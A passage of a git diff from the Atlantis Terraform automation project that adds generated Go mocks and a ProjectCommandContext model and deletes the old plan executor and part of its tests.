+ pegomock "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockStepRunner struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockStepRunner() *MockStepRunner {
+ return &MockStepRunner{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+ params := []pegomock.Param{ctx, extraArgs, path}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Run", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 string
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(string)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockStepRunner) VerifyWasCalledOnce() *VerifierStepRunner {
+ return &VerifierStepRunner{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockStepRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierStepRunner {
+ return &VerifierStepRunner{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockStepRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierStepRunner {
+ return &VerifierStepRunner{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierStepRunner struct {
+ mock *MockStepRunner
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) *StepRunner_Run_OngoingVerification {
+ params := []pegomock.Param{ctx, extraArgs, path}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Run", params)
+ return &StepRunner_Run_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type StepRunner_Run_OngoingVerification struct {
+ mock *MockStepRunner
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *StepRunner_Run_OngoingVerification) GetCapturedArguments() (models.ProjectCommandContext, []string, string) {
+ ctx, extraArgs, path := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1], extraArgs[len(extraArgs)-1], path[len(path)-1]
+}
+
+func (c *StepRunner_Run_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext, _param1 [][]string, _param2 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.ProjectCommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.ProjectCommandContext)
+ }
+ _param1 = make([][]string, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.([]string)
+ }
+ _param2 = make([]string, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(string)
+ }
+ }
+ return
+}
diff --git a/server/events/mocks/mock_webhooks_sender.go b/server/events/mocks/mock_webhooks_sender.go
new file mode 100644
index 0000000000..dfd588807a
--- /dev/null
+++ b/server/events/mocks/mock_webhooks_sender.go
@@ -0,0 +1,81 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WebhooksSender)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ webhooks "github.com/runatlantis/atlantis/server/events/webhooks"
+ logging "github.com/runatlantis/atlantis/server/logging"
+)
+
+type MockWebhooksSender struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockWebhooksSender() *MockWebhooksSender {
+ return &MockWebhooksSender{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockWebhooksSender) Send(log *logging.SimpleLogger, res webhooks.ApplyResult) error {
+ params := []pegomock.Param{log, res}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Send", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(error)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalledOnce() *VerifierWebhooksSender {
+ return &VerifierWebhooksSender{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWebhooksSender {
+ return &VerifierWebhooksSender{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWebhooksSender {
+ return &VerifierWebhooksSender{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierWebhooksSender struct {
+ mock *MockWebhooksSender
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierWebhooksSender) Send(log *logging.SimpleLogger, res webhooks.ApplyResult) *WebhooksSender_Send_OngoingVerification {
+ params := []pegomock.Param{log, res}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Send", params)
+ return &WebhooksSender_Send_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WebhooksSender_Send_OngoingVerification struct {
+ mock *MockWebhooksSender
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WebhooksSender_Send_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, webhooks.ApplyResult) {
+ log, res := c.GetAllCapturedArguments()
+ return log[len(log)-1], res[len(res)-1]
+}
+
+func (c *WebhooksSender_Send_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []webhooks.ApplyResult) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*logging.SimpleLogger, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*logging.SimpleLogger)
+ }
+ _param1 = make([]webhooks.ApplyResult, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(webhooks.ApplyResult)
+ }
+ }
+ return
+}
diff --git a/server/events/mocks/mock_working_dir.go b/server/events/mocks/mock_working_dir.go
new file mode 100644
index 0000000000..8a84ea236f
--- /dev/null
+++ b/server/events/mocks/mock_working_dir.go
@@ -0,0 +1,238 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WorkingDir)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+ logging "github.com/runatlantis/atlantis/server/logging"
+)
+
+type MockWorkingDir struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockWorkingDir() *MockWorkingDir {
+ return &MockWorkingDir{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockWorkingDir) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error) {
+ params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Clone", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 string
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(string)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockWorkingDir) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error) {
+ params := []pegomock.Param{r, p, workspace}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("GetWorkingDir", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 string
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(string)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockWorkingDir) Delete(r models.Repo, p models.PullRequest) error {
+ params := []pegomock.Param{r, p}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Delete", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(error)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockWorkingDir) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error {
+ params := []pegomock.Param{r, p, workspace}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("DeleteForWorkspace", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(error)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockWorkingDir) VerifyWasCalledOnce() *VerifierWorkingDir {
+ return &VerifierWorkingDir{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockWorkingDir) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWorkingDir {
+ return &VerifierWorkingDir{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockWorkingDir) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWorkingDir {
+ return &VerifierWorkingDir{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierWorkingDir struct {
+ mock *MockWorkingDir
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierWorkingDir) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) *WorkingDir_Clone_OngoingVerification {
+ params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Clone", params)
+ return &WorkingDir_Clone_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_Clone_OngoingVerification struct {
+ mock *MockWorkingDir
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_Clone_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.Repo, models.Repo, models.PullRequest, string) {
+ log, baseRepo, headRepo, p, workspace := c.GetAllCapturedArguments()
+ return log[len(log)-1], baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], p[len(p)-1], workspace[len(workspace)-1]
+}
+
+func (c *WorkingDir_Clone_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.Repo, _param2 []models.Repo, _param3 []models.PullRequest, _param4 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*logging.SimpleLogger, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*logging.SimpleLogger)
+ }
+ _param1 = make([]models.Repo, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.Repo)
+ }
+ _param2 = make([]models.Repo, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(models.Repo)
+ }
+ _param3 = make([]models.PullRequest, len(params[3]))
+ for u, param := range params[3] {
+ _param3[u] = param.(models.PullRequest)
+ }
+ _param4 = make([]string, len(params[4]))
+ for u, param := range params[4] {
+ _param4[u] = param.(string)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierWorkingDir) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) *WorkingDir_GetWorkingDir_OngoingVerification {
+ params := []pegomock.Param{r, p, workspace}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GetWorkingDir", params)
+ return &WorkingDir_GetWorkingDir_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_GetWorkingDir_OngoingVerification struct {
+ mock *MockWorkingDir
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_GetWorkingDir_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
+ r, p, workspace := c.GetAllCapturedArguments()
+ return r[len(r)-1], p[len(p)-1], workspace[len(workspace)-1]
+}
+
+func (c *WorkingDir_GetWorkingDir_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ _param2 = make([]string, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(string)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierWorkingDir) Delete(r models.Repo, p models.PullRequest) *WorkingDir_Delete_OngoingVerification {
+ params := []pegomock.Param{r, p}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Delete", params)
+ return &WorkingDir_Delete_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_Delete_OngoingVerification struct {
+ mock *MockWorkingDir
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_Delete_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
+ r, p := c.GetAllCapturedArguments()
+ return r[len(r)-1], p[len(p)-1]
+}
+
+func (c *WorkingDir_Delete_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierWorkingDir) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) *WorkingDir_DeleteForWorkspace_OngoingVerification {
+ params := []pegomock.Param{r, p, workspace}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "DeleteForWorkspace", params)
+ return &WorkingDir_DeleteForWorkspace_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_DeleteForWorkspace_OngoingVerification struct {
+ mock *MockWorkingDir
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_DeleteForWorkspace_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
+ r, p, workspace := c.GetAllCapturedArguments()
+ return r[len(r)-1], p[len(p)-1], workspace[len(workspace)-1]
+}
+
+func (c *WorkingDir_DeleteForWorkspace_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ _param2 = make([]string, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(string)
+ }
+ }
+ return
+}
diff --git a/server/events/mocks/mock_working_dir_locker.go b/server/events/mocks/mock_working_dir_locker.go
new file mode 100644
index 0000000000..c6feb51680
--- /dev/null
+++ b/server/events/mocks/mock_working_dir_locker.go
@@ -0,0 +1,127 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WorkingDirLocker)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+)
+
+type MockWorkingDirLocker struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockWorkingDirLocker() *MockWorkingDirLocker {
+ return &MockWorkingDirLocker{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
+ params := []pegomock.Param{repoFullName, workspace, pullNum}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((*func())(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 func()
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(func())
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockWorkingDirLocker) Unlock(repoFullName string, workspace string, pullNum int) {
+ params := []pegomock.Param{repoFullName, workspace, pullNum}
+ pegomock.GetGenericMockFrom(mock).Invoke("Unlock", params, []reflect.Type{})
+}
+
+func (mock *MockWorkingDirLocker) VerifyWasCalledOnce() *VerifierWorkingDirLocker {
+ return &VerifierWorkingDirLocker{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockWorkingDirLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWorkingDirLocker {
+ return &VerifierWorkingDirLocker{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockWorkingDirLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWorkingDirLocker {
+ return &VerifierWorkingDirLocker{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierWorkingDirLocker struct {
+ mock *MockWorkingDirLocker
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) *WorkingDirLocker_TryLock_OngoingVerification {
+ params := []pegomock.Param{repoFullName, workspace, pullNum}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params)
+ return &WorkingDirLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDirLocker_TryLock_OngoingVerification struct {
+ mock *MockWorkingDirLocker
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDirLocker_TryLock_OngoingVerification) GetCapturedArguments() (string, string, int) {
+ repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
+ return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
+}
+
+func (c *WorkingDirLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]string, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(string)
+ }
+ _param1 = make([]string, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(string)
+ }
+ _param2 = make([]int, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(int)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierWorkingDirLocker) Unlock(repoFullName string, workspace string, pullNum int) *WorkingDirLocker_Unlock_OngoingVerification {
+ params := []pegomock.Param{repoFullName, workspace, pullNum}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params)
+ return &WorkingDirLocker_Unlock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDirLocker_Unlock_OngoingVerification struct {
+ mock *MockWorkingDirLocker
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDirLocker_Unlock_OngoingVerification) GetCapturedArguments() (string, string, int) {
+ repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
+ return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
+}
+
+func (c *WorkingDirLocker_Unlock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]string, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(string)
+ }
+ _param1 = make([]string, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(string)
+ }
+ _param2 = make([]int, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(int)
+ }
+ }
+ return
+}
diff --git a/server/events/models/models.go b/server/events/models/models.go
index 7344fd28e2..db4eb1c820 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -24,8 +24,14 @@ import (
"time"
"github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
)
+// DefaultWorkspace is the default Terraform workspace for both Atlantis and
+// Terraform.
+const DefaultWorkspace = "default"
+
// Repo is a VCS repository.
type Repo struct {
// FullName is the owner and repo name separated
@@ -123,6 +129,7 @@ const (
)
// User is a VCS user.
+// During an autoplan, the user will be the Atlantis API user.
type User struct {
Username string
}
@@ -153,9 +160,16 @@ type Project struct {
// Path to project root in the repo.
// If "." then project is at root.
// Never ends in "/".
+ // todo: rename to RepoRelDir to match rest of project once we can separate
+ // out how this is saved in boltdb vs. its usage everywhere else so we don't
+ // break existing dbs.
Path string
}
+func (p Project) String() string {
+ return fmt.Sprintf("repofullname=%s path=%s", p.RepoFullName, p.Path)
+}
+
// Plan is the result of running an Atlantis plan command.
// This model is used to represent a plan on disk.
type Plan struct {
@@ -205,3 +219,25 @@ func (h VCSHostType) String() string {
}
return ""
}
+
+type ProjectCommandContext struct {
+ // BaseRepo is the repository that the pull request will be merged into.
+ BaseRepo Repo
+ // HeadRepo is the repository that is getting merged into the BaseRepo.
+ // If the pull request branch is from the same repository then HeadRepo will
+ // be the same as BaseRepo.
+ // See https://help.github.com/articles/about-pull-request-merges/.
+ HeadRepo Repo
+ Pull PullRequest
+ // User is the user that triggered this command.
+ User User
+ Log *logging.SimpleLogger
+ RepoRelDir string
+ ProjectConfig *valid.Project
+ GlobalConfig *valid.Config
+
+ // CommentArgs are the extra arguments appended to comment,
+ // ex. atlantis plan -- -target=resource
+ CommentArgs []string
+ Workspace string
+}
diff --git a/server/events/models/models_test.go b/server/events/models/models_test.go
index 0dbb4f49ff..5883f21936 100644
--- a/server/events/models/models_test.go
+++ b/server/events/models/models_test.go
@@ -92,3 +92,10 @@ func TestNewRepo_HTTPSAuth(t *testing.T) {
Name: "repo",
}, repo)
}
+
+func TestProject_String(t *testing.T) {
+ Equals(t, "repofullname=owner/repo path=my/path", (models.Project{
+ RepoFullName: "owner/repo",
+ Path: "my/path",
+ }).String())
+}
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go
deleted file mode 100644
index 478de10a22..0000000000
--- a/server/events/plan_executor.go
+++ /dev/null
@@ -1,148 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "os"
- "path/filepath"
-
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/locking"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/run"
- "github.com/runatlantis/atlantis/server/events/terraform"
- "github.com/runatlantis/atlantis/server/events/vcs"
-)
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
-
-// LockURLGenerator consumes lock URLs.
-type LockURLGenerator interface {
- // SetLockURL takes a function that given a lock id, will return a url
- // to view that lock.
- SetLockURL(func(id string) (url string))
-}
-
-// atlantisUserTFVar is the name of the variable we execute terraform
-// with, containing the vcs username of who is running the command
-const atlantisUserTFVar = "atlantis_user"
-
-// PlanExecutor handles everything related to running terraform plan.
-type PlanExecutor struct {
- VCSClient vcs.ClientProxy
- Terraform terraform.Client
- Locker locking.Locker
- LockURL func(id string) (url string)
- Run run.Runner
- Workspace AtlantisWorkspace
- ProjectPreExecute ProjectPreExecutor
- ProjectFinder ProjectFinder
-}
-
-// PlanSuccess is the result of a successful plan.
-type PlanSuccess struct {
- TerraformOutput string
- LockURL string
-}
-
-// SetLockURL takes a function that given a lock id, will return a url
-// to view that lock.
-func (p *PlanExecutor) SetLockURL(f func(id string) (url string)) {
- p.LockURL = f
-}
-
-// Execute executes terraform plan for the ctx.
-func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse {
- cloneDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
- if err != nil {
- return CommandResponse{Error: err}
- }
-
- var projects []models.Project
- if ctx.Command.Dir == "" {
- // If they didn't specify a directory to plan in, figure out what
- // projects have been modified so we know where to run plan.
- modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
- if err != nil {
- return CommandResponse{Error: errors.Wrap(err, "getting modified files")}
- }
- ctx.Log.Info("found %d files modified in this pull request", len(modifiedFiles))
- projects = p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, cloneDir)
- if len(projects) == 0 {
- return CommandResponse{Failure: "No Terraform files were modified."}
- }
- } else {
- projects = []models.Project{{
- Path: ctx.Command.Dir,
- RepoFullName: ctx.BaseRepo.FullName,
- }}
- }
-
- var results []ProjectResult
- for _, project := range projects {
- ctx.Log.Info("running plan for project at path %q", project.Path)
- result := p.plan(ctx, cloneDir, project)
- result.Path = project.Path
- results = append(results, result)
- }
- return CommandResponse{ProjectResults: results}
-}
-
-func (p *PlanExecutor) plan(ctx *CommandContext, repoDir string, project models.Project) ProjectResult {
- preExecute := p.ProjectPreExecute.Execute(ctx, repoDir, project)
- if preExecute.ProjectResult != (ProjectResult{}) {
- return preExecute.ProjectResult
- }
- config := preExecute.ProjectConfig
- terraformVersion := preExecute.TerraformVersion
- workspace := ctx.Command.Workspace
-
- // Run terraform plan.
- planFile := filepath.Join(repoDir, project.Path, fmt.Sprintf("%s.tfplan", workspace))
- userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username)
- planExtraArgs := config.GetExtraArguments(ctx.Command.Name.String())
- tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, planExtraArgs...), ctx.Command.Flags...)
-
- // Check if env/{workspace}.tfvars exist.
- envFileName := filepath.Join("env", workspace+".tfvars")
- if _, err := os.Stat(filepath.Join(repoDir, project.Path, envFileName)); err == nil {
- tfPlanCmd = append(tfPlanCmd, "-var-file", envFileName)
- }
- output, err := p.Terraform.RunCommandWithVersion(ctx.Log, filepath.Join(repoDir, project.Path), tfPlanCmd, terraformVersion, workspace)
- if err != nil {
- // Plan failed so unlock the state.
- if _, unlockErr := p.Locker.Unlock(preExecute.LockResponse.LockKey); unlockErr != nil {
- ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
- }
- return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)}
- }
- ctx.Log.Info("plan succeeded")
-
- // If there are post plan commands then run them.
- if len(config.PostPlan) > 0 {
- absolutePath := filepath.Join(repoDir, project.Path)
- _, err := p.Run.Execute(ctx.Log, config.PostPlan, absolutePath, workspace, terraformVersion, "post_plan")
- if err != nil {
- return ProjectResult{Error: errors.Wrap(err, "running post plan commands")}
- }
- }
-
- return ProjectResult{
- PlanSuccess: &PlanSuccess{
- TerraformOutput: output,
- LockURL: p.LockURL(preExecute.LockResponse.LockKey),
- },
- }
-}
diff --git a/server/events/plan_executor_test.go b/server/events/plan_executor_test.go
deleted file mode 100644
index 24e5452c9b..0000000000
--- a/server/events/plan_executor_test.go
+++ /dev/null
@@ -1,291 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "errors"
- "testing"
-
- "github.com/mohae/deepcopy"
- . "github.com/petergtz/pegomock"
- "github.com/runatlantis/atlantis/server/events"
- "github.com/runatlantis/atlantis/server/events/locking"
- lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks"
- "github.com/runatlantis/atlantis/server/events/mocks"
- "github.com/runatlantis/atlantis/server/events/models"
- rmocks "github.com/runatlantis/atlantis/server/events/run/mocks"
- tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks"
